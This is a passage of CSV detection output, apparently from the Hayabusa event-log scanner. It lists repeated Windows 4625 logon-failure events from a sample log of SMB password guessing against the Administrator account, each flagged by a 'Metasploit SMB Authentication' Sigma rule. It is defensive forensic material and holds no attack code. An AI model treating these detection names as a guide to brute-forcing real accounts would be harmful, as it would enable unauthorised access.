Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.874 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iF1dq6UfuqpFpGkf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.874 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.938 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NQVTj9OLayvEg8dg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.938 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.987 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 98F9mULm7DsRUN49 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.987 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h6KjEOAdknvIMwOA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.047 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UHUu0OKm8fsHTnum : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.140 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esdoSyg6HkaSiJ0z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.140 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M4lnVe7qNVEspxFV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.192 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Phei86bKte1UCbMi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.236 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ehA1LQ2Rs0Wts9JW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.280 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.318 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WcXtnkpww8HlSBb3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.318 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y8U7FrQZgDvQ09Uq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.372 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.430 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UgWwCtz3Gnoq9zYd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.430 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.478 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mRNPwCogYrwSGeZf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.478 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6O9rWY8UGCbuhSwZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.523 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HuH4avUJ4AwqXTGa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.552 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: japOFEaHgyT3T2fO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.617 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IXpRMMNJRgjmd4km : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gtTXA6BiiVyv42cj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.706 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wfYkwvNOfKj7rlTj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.749 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QzAZyceDjfmUOdz6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.805 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C0Qais0cF8avXJQ6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.849 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7KBM2fIEK6pEl7F2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.940 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N3stckaysFk58QAF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.972 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.017 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oVK4S15DDLWISQ7i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.017 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.070 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fAA1bFLD5YMohS9q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.070 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.105 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k5V3sfIsj4kYtaGe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.105 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IJw4MBG0cvIz2fMR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.152 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AXJ0UBfKCzLXJ5y0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.196 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z3A2mmYGcjHBbX3M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.232 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oGlR6pBLnDrzMsqu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.268 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gv7nWzZ1HN9mgTya : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.316 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dnPUb3w2d7Ltif2E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.418 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GCWXdvBeDPpeKhWJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.521 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GN3OXSzQqLDF348i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.576 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AAWiBhYPNQ0RUuOX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.662 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V5CBG3hblqr8kvWw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.662 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MDBaKpfYttm4H1gj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.706 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.743 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PNszt6piEznMlTdF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.743 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iqmBPOQIG6M1rZjX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.789 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BJs7tuZpsPMYJHOD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.844 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LUT5oe2DwS5vW84K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.880 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3OTe0uiDHhf5GzRL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.928 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 71TuxFRZFyZEQp1S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.964 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xRvTmizOLj3UUpD7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LnQEZPWaN2OkpTLa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HnHR9DAtgzu561sx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.076 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DfBl3dbluZ7GiFum : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 